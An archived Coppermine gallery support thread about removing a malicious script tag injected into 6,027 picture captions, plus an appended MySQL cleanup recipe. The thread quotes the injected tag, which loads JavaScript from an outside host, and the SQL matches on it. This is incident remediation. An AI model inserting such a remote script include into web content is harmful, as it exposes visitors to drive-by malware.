forum.coppermine-gallery.net

Support => cpg1.4.x Support => Older/other versions => cpg1.4 miscellaneous => Topic started by: redbjork on March 27, 2009, 12:43:01 am

Title: [Solved]: Avast warning about HTML:Script-inf
Post by: redbjork on March 27, 2009, 12:43:01 am
Hello and thank you for a great product.

A couple of days ago I was struck with malware on my coppermine site.
So I started to google for answers and found this that I followed
http://forum.coppermine-gallery.net/index.php/topic,51671.0/prev_next,next.html#new

So I thought I had cleaned the site using winmerge and the guide plus upgrading to latest version (Coppermine Photo Gallery 1.4.21 (stable)).
Then I got reports that it still was infected with a malware called HTML:Script-inf.
I could not believe this because it was/is squeaky clean. Only unique files are those explained in the link, plus my album stuff (jpg and flash files).
So I downloaded avast and updated to latest version. And found some evil code

(attached file)
This is the interesting part
<!-- BEGIN caption -->
                                <tr>
                                        <td class="tableb"><center>
                                                <script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>
                                        </center></td>
                                </tr>
<!-- END caption -->

Problem is that I cannot find this code on my site (searched every file on site for this text without luck). This is generated somehow, from what I do not know.

Link to the infected part:
http://www.fanvadnajs.se/coppermine/displayimage.php?album=108&pos=0

Any assistance would be appreciated.
Title: Re: Avast warning about HTML:Script-inf
Post by: Nibbler on March 27, 2009, 03:44:30 am
That code has been set as the caption for all your files (so it's in the database not a file). You'll need to set new captions for all your files.
Title: Re: Avast warning about HTML:Script-inf
Post by: redbjork on March 27, 2009, 07:54:57 am
Thank you so much  ;D
I opened my phpmyadmin and did a search on the address
I found the following
6027 match(es) inside table cpg149_pictures

Now I have a couple of questions.
1.   How do I clean this? I'm no expert in phpMyAdmin, but I guess that I could individually remove each line of code 6027 times. I'm guessing there is a faster way.
2.   Does anyone know how this happened? Yes this is lack of security, but where? Do I need to tell my host to upgrade software or is the fault mine?
This probably happened when I had the older version of coppermine, but now it's upgraded.
3.   How do I stop this from happening again? Any tip would be welcome.

I have included two files to assist you in your answers.
The exported cpg149_pictures database and myphpinfo from coppermine.

And thank you again.
Title: Re: Avast warning about HTML:Script-inf
Post by: Nibbler on March 27, 2009, 01:47:42 pm
Run this query in phpmyadmin to clean the captions:

Code:
UPDATE cpg149_pictures SET caption = ''
Title: Re: Avast warning about HTML:Script-inf
Post by: redbjork on March 27, 2009, 03:09:48 pm
If I run
UPDATE cpg149_pictures SET caption = ''
Doesn't that remove all the comments also? I just want to remove the bad code.

Thank you for the help again.
Title: Re: Avast warning about HTML:Script-inf
Post by: redbjork on March 27, 2009, 03:40:27 pm
Asked a friend that knows msql
He gave me this code to run

UPDATE cpg149_pictures SET caption = '' WHERE caption like '%<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>%'

That worked like a charm   :) :D ;D Removed all unwanted code but not the comments that I wanted to keep.

So now to question 2 and 3? Any ideas?

I just want everything to be up to specs. And for all other people that will or has the same problem.

Thank you for all your help, I'm impressed by the speed I received help.
Title: Re: Avast warning about HTML:Script-inf
Post by: Joachim Müller on March 27, 2009, 08:56:15 pm
The fields "caption" and comments posted on a file (residing in another table) are different animals.
Title: Re: [Solved]: Avast warning about HTML:Script-inf
Post by: redbjork on March 27, 2009, 09:12:24 pm
Ah ok, well I was unsure, so I guess both of the queries would have worked then. ::)
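
Added example, not part of the original thread: a MySQL cleanup that removes only the injected tag quoted above from `caption` and keeps any caption text around it, which goes one step beyond the queries posted in the thread. The backup table name `cpg149_pictures_bak` is a hypothetical name; the table, column and tag string are the ones given in the posts.

```sql
-- Added example (not from the thread). Assumes MySQL, run from phpMyAdmin's SQL tab.
-- cpg149_pictures_bak is a hypothetical name for the safety copy.

-- 1. Keep a copy of the table before changing anything.
CREATE TABLE cpg149_pictures_bak LIKE cpg149_pictures;
INSERT INTO cpg149_pictures_bak SELECT * FROM cpg149_pictures;

-- 2. Count the rows that carry the injected tag. This should agree with
--    the number of matches the phpMyAdmin search reported.
SELECT COUNT(*) AS infected_rows
FROM cpg149_pictures
WHERE caption LIKE '%<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>%';

-- 3. Count the infected rows that also hold real caption text. Blanking the
--    whole caption would lose that text; step 4 keeps it.
SELECT COUNT(*) AS infected_rows_with_text
FROM cpg149_pictures
WHERE caption LIKE '%<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>%'
  AND TRIM(REPLACE(caption,
        '<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>',
        '')) <> '';

-- 4. Remove only the injected tag and leave the rest of each caption alone.
UPDATE cpg149_pictures
SET caption = TRIM(REPLACE(caption,
        '<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>',
        ''))
WHERE caption LIKE '%<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>%';

-- 5. Verify: no caption should contain any script tag afterwards. A non-zero
--    count means a different tag or URL was injected as well.
SELECT COUNT(*) AS captions_with_script
FROM cpg149_pictures
WHERE LOWER(caption) LIKE '%<script%';

-- 6. Once the gallery pages have been checked, drop the safety copy.
-- DROP TABLE cpg149_pictures_bak;
```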